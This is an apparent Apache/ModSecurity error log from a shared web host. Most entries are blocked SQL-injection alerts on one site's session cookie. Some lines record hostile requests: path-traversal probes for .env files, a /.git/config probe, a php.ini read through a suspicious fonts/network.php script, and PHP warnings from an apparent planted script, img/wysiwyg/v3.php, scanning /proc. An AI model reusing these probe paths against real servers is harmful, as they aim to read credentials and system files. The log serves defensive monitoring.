[Tue May 12 03:33:45.728103 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/new"] [unique_id "agKDeTue9Sp-pIv_Bb6dLgAAAUo"]
[Tue May 12 03:33:45.728331 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/new"] [unique_id "agKDeTue9Sp-pIv_Bb6dLgAAAUo"]
[Tue May 12 03:33:46.284974 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDeTue9Sp-pIv_Bb6dLgAAAUo"]
[Tue May 12 03:33:47.457749 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/news/"] [unique_id "agKDezue9Sp-pIv_Bb6dLwAAAUo"]
[Tue May 12 03:33:47.457954 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/news/"] [unique_id "agKDezue9Sp-pIv_Bb6dLwAAAUo"]
[Tue May 12 03:33:47.835875 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDezue9Sp-pIv_Bb6dLwAAAUo"]
[Tue May 12 03:33:48.491921 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/old"] [unique_id "agKDfDue9Sp-pIv_Bb6dMAAAAUo"]
[Tue May 12 03:33:48.492141 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/old"] [unique_id "agKDfDue9Sp-pIv_Bb6dMAAAAUo"]
[Tue May 12 03:33:49.088708 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDfDue9Sp-pIv_Bb6dMAAAAUo"]
[Tue May 12 03:33:49.821842 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/beta"] [unique_id "agKDfTue9Sp-pIv_Bb6dMgAAAUo"]
[Tue May 12 03:33:49.822049 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/beta"] [unique_id "agKDfTue9Sp-pIv_Bb6dMgAAAUo"]
[Tue May 12 03:33:50.433067 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDfTue9Sp-pIv_Bb6dMgAAAUo"]
[Tue May 12 03:33:52.931426 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/demo"] [unique_id "agKDgDue9Sp-pIv_Bb6dMwAAAUo"]
[Tue May 12 03:33:52.931638 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/demo"] [unique_id "agKDgDue9Sp-pIv_Bb6dMwAAAUo"]
[Tue May 12 03:33:53.775616 2026] [core:error] [pid 1707624:tid 1707695] [client 45.148.10.247:8808] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 03:33:53.830847 2026] [core:error] [pid 1730207:tid 1730222] [client 45.148.10.247:8746] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 03:33:53.881322 2026] [core:error] [pid 1730175:tid 1730190] [client 45.148.10.247:8860] AH10244: invalid URI path (/../.env)
[Tue May 12 03:33:54.120937 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDgDue9Sp-pIv_Bb6dMwAAAUo"]
[Tue May 12 03:33:58.860883 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/backup"] [unique_id "agKDhjue9Sp-pIv_Bb6dRAAAAUo"]
[Tue May 12 03:33:58.861088 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/backup"] [unique_id "agKDhjue9Sp-pIv_Bb6dRAAAAUo"]
[Tue May 12 03:33:59.443012 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDhjue9Sp-pIv_Bb6dRAAAAUo"]
[Tue May 12 03:34:01.286229 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/dev"] [unique_id "agKDiTue9Sp-pIv_Bb6dRQAAAUo"]
[Tue May 12 03:34:01.286461 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/dev"] [unique_id "agKDiTue9Sp-pIv_Bb6dRQAAAUo"]
[Tue May 12 03:34:01.903103 2026] [security2:error] [pid 1730207:tid 1730219] [client 172.104.186.23:52920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDiTue9Sp-pIv_Bb6dRQAAAUo"]
PHP Warning:  filesize(): stat failed for /proc/1704230/task/1704230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704230/task/1704230/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704230/task/1704230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704230/task/1704230/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704230/task/1704230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704230/task/1704230/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:34:07.121209 2026] [security2:error] [pid 1691274:tid 1691296] [client 170.106.181.163:37236] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKDj1fdQaraX_prmqcsKgAAABQ"]
[Tue May 12 03:34:12.443217 2026] [security2:error] [pid 1691274:tid 1691289] [client 170.106.181.163:41938] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agKDlFfdQaraX_prmqcsMQAAAAw"], referer: http://pole-de-mobilite-regional.com
[Tue May 12 03:34:15.435412 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/staging"] [unique_id "agKDl3o6NvB9WXx5V-6HcwAAAQs"]
[Tue May 12 03:34:15.435629 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/staging"] [unique_id "agKDl3o6NvB9WXx5V-6HcwAAAQs"]
[Tue May 12 03:34:16.068158 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDl3o6NvB9WXx5V-6HcwAAAQs"]
[Tue May 12 03:34:17.135201 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/temp"] [unique_id "agKDmXo6NvB9WXx5V-6HegAAAQs"]
[Tue May 12 03:34:17.135512 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/temp"] [unique_id "agKDmXo6NvB9WXx5V-6HegAAAQs"]
[Tue May 12 03:34:17.733272 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDmXo6NvB9WXx5V-6HegAAAQs"]
[Tue May 12 03:34:20.696914 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/v1"] [unique_id "agKDnHo6NvB9WXx5V-6HhgAAAQs"]
[Tue May 12 03:34:20.697122 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/v1"] [unique_id "agKDnHo6NvB9WXx5V-6HhgAAAQs"]
[Tue May 12 03:34:21.292044 2026] [security2:error] [pid 1730175:tid 1730188] [client 172.104.186.23:52462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKDnHo6NvB9WXx5V-6HhgAAAQs"]
[Tue May 12 03:34:57.987578 2026] [security2:error] [pid 1691274:tid 1691490] [client 34.78.86.75:46210] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agKDwVfdQaraX_prmqcsjQAAABU"]
[Tue May 12 03:34:57.987923 2026] [security2:error] [pid 1691274:tid 1691490] [client 34.78.86.75:46210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agKDwVfdQaraX_prmqcsjQAAABU"]
[Tue May 12 03:34:57.988185 2026] [security2:error] [pid 1691274:tid 1691490] [client 34.78.86.75:46210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.com.manhattan-studio.fr"] [uri "/.git/config"] [unique_id "agKDwVfdQaraX_prmqcsjQAAABU"]
[Tue May 12 03:35:05.394107 2026] [security2:error] [pid 1709071:tid 1709105] [client 216.73.216.110:56926] ModSecurity: Warning. Matched phrase "etc/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/php.ini found within ARGS:filesrc: /opt/cpanel/ea-php74/root/etc/php.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKDybvMumyrWMfSu7q2hwAAANI"]
